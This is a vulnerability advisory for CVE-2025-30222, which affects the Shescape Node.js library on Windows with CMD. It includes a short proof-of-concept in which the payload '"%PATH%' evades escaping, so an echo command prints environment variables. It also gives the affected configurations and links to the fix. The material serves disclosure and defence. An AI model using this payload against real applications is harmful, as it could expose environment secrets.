CVE-2025-30222: Shescape has potential environment variable exposure on Windows with CMD
This impact users of Shescape on Windows that explicitly configure shell: 'cmd.exe' or shell: true using any of quote/quoteAll/escape/escapeAll.
An attacker may be able to get read-only access to environment variables. Example:
import * as cp from "node:child_process";
import { Shescape } from "shescape";
// 1. Prerequisites
const shescape = new Shescape({
shell: "cmd.exe",
// Or
shell: true, // Only if the default shell is CMD
});
// 2. Payload
const payload = '"%PATH%';
// 3. Usage
let escapedPayload;
escapedPayload = shescape.quote(payload);
// Or
escapedPayload = shescape.quoteAll([payload]);
// Or
escapedPayload = shescape.escape(payload);
// Or
escapedPayload = shescape.escapeAll([payload]);
// And (example)
const result = cp.execSync(`echo Hello ${escapedPayload}`, options);
// 4. Impact
console.log(result.toString());
// Outputs "Hello" followed by the contents of the PATH environment variable
For Shescape prior to v2.0.0, the options object must have shell: 'cmd.exe' or shell: undefined and interpolation: true.
References
- github.com/advisories/GHSA-66pp-5p9w-q87j
- github.com/ericcornelissen/shescape
- github.com/ericcornelissen/shescape/commit/0a81f1eb077bab8caae283a2490cd7be9af179c6
- github.com/ericcornelissen/shescape/pull/1916
- github.com/ericcornelissen/shescape/releases/tag/v2.1.2
- github.com/ericcornelissen/shescape/security/advisories/GHSA-66pp-5p9w-q87j
- nvd.nist.gov/vuln/detail/CVE-2025-30222
Code Behaviors & Features
Detect and mitigate CVE-2025-30222 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →